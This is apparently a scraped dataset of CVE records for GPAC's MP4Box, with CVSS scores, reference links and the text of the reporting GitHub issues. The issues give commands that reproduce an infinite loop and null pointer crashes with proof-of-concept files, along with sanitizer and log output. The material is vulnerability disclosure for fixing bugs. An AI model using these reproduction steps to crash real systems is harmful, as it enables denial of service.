"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/20c0f29139a82779b86453ce7f68d0681ec7624c"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2871"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/user-attachments/files/15801058/poc1.zip"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268789"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268789"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356308"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/20c0f29139a82779b86453ce7f68d0681ec7624c"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2871"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/user-attachments/files/15801058/poc1.zip"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268789"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268789"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356308"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*",
"matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"835"
] | 835 | https://github.com/gpac/gpac/issues/2871 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | ## version
```shell
./MP4Box -version
MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master
(c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
## reproduce
Complie and run
```
./configure --enable-sanitizer
make
./MP4Box -dash 1000 -out /dev/null poc1
```
Information
```
···
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
[IsoMedia] Failed to fetch initial sample 1 for track 3
···
```
## poc
[poc1.zip](https://github.com/user-attachments/files/15801058/poc1.zip)
| Infinite loop in MP4Box | https://api.github.com/repos/gpac/gpac/issues/2871/comments | 0 | 2024-06-12T08:30:30Z | 2024-06-12T13:25:17Z | https://github.com/gpac/gpac/issues/2871 | 2,348,153,606 | 2,871 | 6,085 |
CVE-2024-6062 | 2024-06-17T20:15:15.170 | A vulnerability was found in GPAC 2.5-DEV-rev228-g11067ea92-master and classified as problematic. Affected by this issue is the function swf_svg_add_iso_sample of the file src/filters/load_text.c of the component MP4Box. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The patch is identified as 31e499d310a48bd17c8b055a0bfe0fe35887a7cd. It is recommended to apply a patch to fix this issue. VDB-268790 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 1.7,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/31e499d310a48bd17c8b055a0bfe0fe35887a7cd"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2872"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/user-attachments/files/15801126/poc2.zip"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268790"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268790"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356314"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/31e499d310a48bd17c8b055a0bfe0fe35887a7cd"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2872"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/user-attachments/files/15801126/poc2.zip"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268790"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268790"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356314"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*",
"matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/gpac/gpac/issues/2872 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | ## version
```shell
./MP4Box -version
MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master
(c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
## reproduce
Complie and run
```
./configure --enable-sanitizer
make
./MP4Box -dash 1000 -out /dev/null poc2
```
Information
```shell
SWF Import - Scene Size 320x240 - 139 frames @ 25 FPS
[TXTIn] swf -> svg not fully migrated, using SWF flags 0 and no flatten angle. Patch welcome
[Dasher] No template assigned, using $File$_dash$FS$$Number$
[Dasher] No bitrate property assigned to PID poc2, computing from bitstream
[SWF Parsing] Tag MX1 (0x3c) not implemented - skipping (frame 1)
[SWF Parsing] Placing unfound object (ID 0) (frame 1)
[SWF Parsing] Tag MX2 (0x3d) not implemented - skipping (frame 1)
[SWF Parsing] Accessing empty depth level 1 (frame 2)
[SWF Parsing] Moving unfound object (ID 0) (frame 2)
[SWF Parsing] Tag MX2 (0x3d) not implemented - skipping (frame 2)
filters/load_text.c:2534:3: runtime error: null pointer passed as argument 2, which is declared to never be null
```
## poc
[poc2.zip](https://github.com/user-attachments/files/15801126/poc2.zip)
| Null pointer deference in filters/load_text.c:2534 | https://api.github.com/repos/gpac/gpac/issues/2872/comments | 0 | 2024-06-12T08:31:34Z | 2024-06-12T13:31:34Z | https://github.com/gpac/gpac/issues/2872 | 2,348,155,759 | 2,872 | 6,086 |
CVE-2024-6063 | 2024-06-17T21:15:51.443 | A vulnerability was found in GPAC 2.5-DEV-rev228-g11067ea92-master. It has been classified as problematic. This affects the function m2tsdmx_on_event of the file src/filters/dmx_m2ts.c of the component MP4Box. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The patch is named 8767ed0a77c4b02287db3723e92c2169f67c85d5. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-268791. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 1.7,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/8767ed0a77c4b02287db3723e92c2169f67c85d5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2873"
},
{
"source": "cna@vuldb.com",
"tags": [
"Broken Link"
],
"url": "https://github.com/user-attachments/files/15801157/poc.zip"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268791"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.268791"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356315"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/gpac/gpac/commit/8767ed0a77c4b02287db3723e92c2169f67c85d5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2873"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/user-attachments/files/15801157/poc.zip"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268791"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.268791"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.356315"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*",
"matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/gpac/gpac/issues/2873 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | ## version
```shell
./MP4Box -version
MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master
(c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
## reproduce
Complie and run
```
./configure --enable-sanitizer
make
./MP4Box -dash 1000 -out /dev/null poc3
```
Information
```shell
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 3 is scrambled - not supported
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 5 is scrambled - not supported
[MPEG-2 TS] TS Packet 6 is scrambled - not supported
[MPEG-2 TS] TS Packet 7 is scrambled - not supported
[MPEG-2 TS] TS Packet 8 is scrambled - not supported
[MPEG-2 TS] TS Packet 9 is scrambled - not supported
[MPEG-2 TS] TS Packet 10 is scrambled - not supported
[MPEG-2 TS] TS Packet 11 is scrambled - not supported
[MPEG-2 TS] TS Packet 12 is scrambled - not supported
[MPEG-2 TS] TS Packet 13 is scrambled - not supported
[MPEG-2 TS] TS Packet 14 is scrambled - not supported
[MPEG-2 TS] TS Packet 15 is scrambled - not supported
[MPEG-2 TS] TS Packet 16 is scrambled - not supported
[MPEG-2 TS] TS Packet 17 is scrambled - not supported
[MPEG-2 TS] TS Packet 18 is scrambled - not supported
[MPEG-2 TS] TS Packet 19 is scrambled - not supported
[MPEG-2 TS] TS Packet 20 is scrambled - not supported
[MPEG-2 TS] TS Packet 21 is scrambled - not supported
[MPEG-2 TS] TS Packet 22 is scrambled - not supported
[MPEG-2 TS] TS Packet 23 is scrambled - not supported
[MPEG-2 TS] TS Packet 24 does not start with sync marker
[MPEG-2 TS] TS Packet 25 AF size is 71 when it must be 183 for AF type 2
[MPEG-2 TS] TS Packet 26 does not start with sync marker
[MPEG-2 TS] TS Packet 27 does not start with sync marker
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] PID 18 AF Location descriptor found - URL TR▒
[MPEG-2 TS] PID 18: Bad Adaptation Descriptor found (tag 0) size is 0 but only 1 bytes available
[MPEG-2 TS] TS Packet 30 does not start with sync marker
[MPEG-2 TS] TS Packet 31 does not start with sync marker
[MPEG-2 TS] TS Packet 32 does not start with sync marker
[MPEG-2 TS] TS Packet 33 does not start with sync marker
[MPEG-2 TS] TS Packet 34 does not start with sync marker
[MPEG-2 TS] TS Packet 35 does not start with sync marker
[MPEG-2 TS] TS Packet 36 is scrambled - not supported
[MPEG-2 TS] TS Packet 37 is scrambled - not supported
[MPEG-2 TS] TS Packet 38 does not start with sync marker
[MPEG-2 TS] TS Packet 39 does not start with sync marker
[MPEG-2 TS] TS Packet 40 does not start with sync marker
[MPEG-2 TS] TS Packet 41 does not start with sync marker
[MPEG-2 TS] TS Packet 42 does not start with sync marker
[MPEG-2 TS] TS Packet 43 does not start with sync marker
[MPEG-2 TS] TS Packet 44 does not start with sync marker
[MPEG-2 TS] TS Packet 45 does not start with sync marker
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 48 is scrambled - not supported
[MPEG-2 TS] TS Packet 49 is scrambled - not supported
[MPEG-2 TS] TS Packet 50 is scrambled - not supported
[MPEG-2 TS] TS Packet 51 does not start with sync marker
[MPEG-2 TS] TS Packet 52 does not start with sync marker
[MPEG-2 TS] TS Packet 53 does not start with sync marker
[MPEG-2 TS] TS Packet 54 does not start with sync marker
[MPEG-2 TS] TS Packet 55 does not start with sync marker
[MPEG-2 TS] TS Packet 56 does not start with sync marker
[MPEG-2 TS] TS Packet 57 is scrambled - not supported
[MPEG-2 TS] TS Packet 58 does not start with sync marker
[MPEG-2 TS] TS Packet 59 is scrambled - not supported
[MPEG-2 TS] TS Packet 60 is scrambled - not supported
[MPEG-2 TS] TS Packet 61 does not start with sync marker
[MPEG-2 TS] TS Packet 62 does not start with sync marker
[MPEG-2 TS] TS Packet 63 does not start with sync marker
[MPEG-2 TS] TS Packet 64 does not start with sync marker
[MPEG-2 TS] TS Packet 65 does not start with sync marker
[MPEG-2 TS] TS Packet 66 does not start with sync marker
[MPEG-2 TS] TS Packet 67 does not start with sync marker
[MPEG-2 TS] TS Packet 68 does not start with sync marker
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 70 does not start with sync marker
[MPEG-2 TS] TS Packet 71 does not start with sync marker
[MPEG-2 TS] TS Packet 72 does not start with sync marker
[MPEG-2 TS] TS Packet 73 does not start with sync marker
[MPEG-2 TS] TS Packet 74 does not start with sync marker
[MPEG-2 TS] TS Packet 75 does not start with sync marker
[MPEG-2 TS] TS Packet 76 is scrambled - not supported
[MPEG-2 TS] TS Packet 77 is scrambled - not supported
[MPEG-2 TS] TS Packet 78 does not start with sync marker
[MPEG-2 TS] TS Packet 79 does not start with sync marker
[MPEG-2 TS] TS Packet 80 does not start with sync marker
[MPEG-2 TS] TS Packet 81 does not start with sync marker
[MPEG-2 TS] TS Packet 82 does not start with sync marker
[MPEG-2 TS] TS Packet 83 does not start with sync marker
[MPEG-2 TS] TS Packet 84 does not start with sync marker
[MPEG-2 TS] TS Packet 85 is scrambled - not supported
[MPEG-2 TS] TS Packet 86 does not start with sync marker
[MPEG-2 TS] TS Packet 87 does not start with sync marker
[MPEG-2 TS] TS Packet 88 does not start with sync marker
[MPEG-2 TS] TS Packet 89 is scrambled - not supported
[MPEG-2 TS] TS Packet 90 is scrambled - not supported
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 93 is scrambled - not supported
[MPEG-2 TS] TS Packet 94 is scrambled - not supported
[MPEG-2 TS] TS Packet 95 does not start with sync marker
[MPEG-2 TS] TS Packet 96 does not start with sync marker
[MPEG-2 TS] TS Packet 97 does not start with sync marker
[MPEG-2 TS] TS Packet 98 does not start with sync marker
[MPEG-2 TS] TS Packet 99 does not start with sync marker
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 101 does not start with sync marker
[MPEG-2 TS] TS Packet 102 is scrambled - not supported
[MPEG-2 TS] TS Packet 103 is scrambled - not supported
[MPEG-2 TS] TS Packet 104 is scrambled - not supported
[MPEG-2 TS] TS Packet 105 does not start with sync marker
[MPEG-2 TS] TS Packet 106 does not start with sync marker
[MPEG-2 TS] TS Packet 107 does not start with sync marker
[MPEG-2 TS] TS Packet 108 does not start with sync marker
[MPEG-2 TS] TS Packet 109 does not start with sync marker
[MPEG-2 TS] TS Packet 110 is scrambled - not supported
[MPEG-2 TS] TS Packet 112 does not start with sync marker
[MPEG-2 TS] TS Packet 113 does not start with sync marker
[MPEG-2 TS] TS Packet 114 does not start with sync marker
[MPEG-2 TS] TS Packet 116 does not start with sync marker
[MPEG-2 TS] TS Packet 117 does not start with sync marker
[MPEG-2 TS] TS Packet 118 does not start with sync marker
[MPEG-2 TS] TS Packet 119 does not start with sync marker
[MPEG-2 TS] TS Packet 120 does not start with sync marker
[MPEG-2 TS] PID 1024: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 122 is scrambled - not supported
[MPEG-2 TS] TS Packet 123 is scrambled - not supported
[MPEG-2 TS] TS Packet 124 is scrambled - not supported
[MPEG-2 TS] TS Packet 125 is scrambled - not supported
[MPEG-2 TS] TS Packet 126 is scrambled - not supported
[MPEG-2 TS] TS Packet 127 is scrambled - not supported
[MPEG-2 TS] TS Packet 128 is scrambled - not supported
[MPEG-2 TS] TS Packet 129 is scrambled - not supported
[MPEG-2 TS] TS Packet 130 is scrambled - not supported
[MPEG-2 TS] TS Packet 131 is scrambled - not supported
[MPEG-2 TS] TS Packet 132 is scrambled - not supported
[MPEG-2 TS] TS Packet 133 is scrambled - not supported
[MPEG-2 TS] TS Packet 134 is scrambled - not supported
[MPEG-2 TS] TS Packet 135 is scrambled - not supported
[MPEG-2 TS] TS Packet 136 is scrambled - not supported
[MPEG-2 TS] TS Packet 137 is scrambled - not supported
[MPEG-2 TS] TS Packet 138 is scrambled - not supported
[MPEG-2 TS] TS Packet 139 is scrambled - not supported
[MPEG-2 TS] TS Packet 140 is scrambled - not supported
[MPEG-2 TS] TS Packet 141 is scrambled - not supported
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 143 does not start with sync marker
[MPEG-2 TS] TS Packet 144 does not start with sync marker
[MPEG-2 TS] PID 1863: Bad Adaptation Extension found
[MPEG-2 TS] TS Packet 146 does not start with sync marker
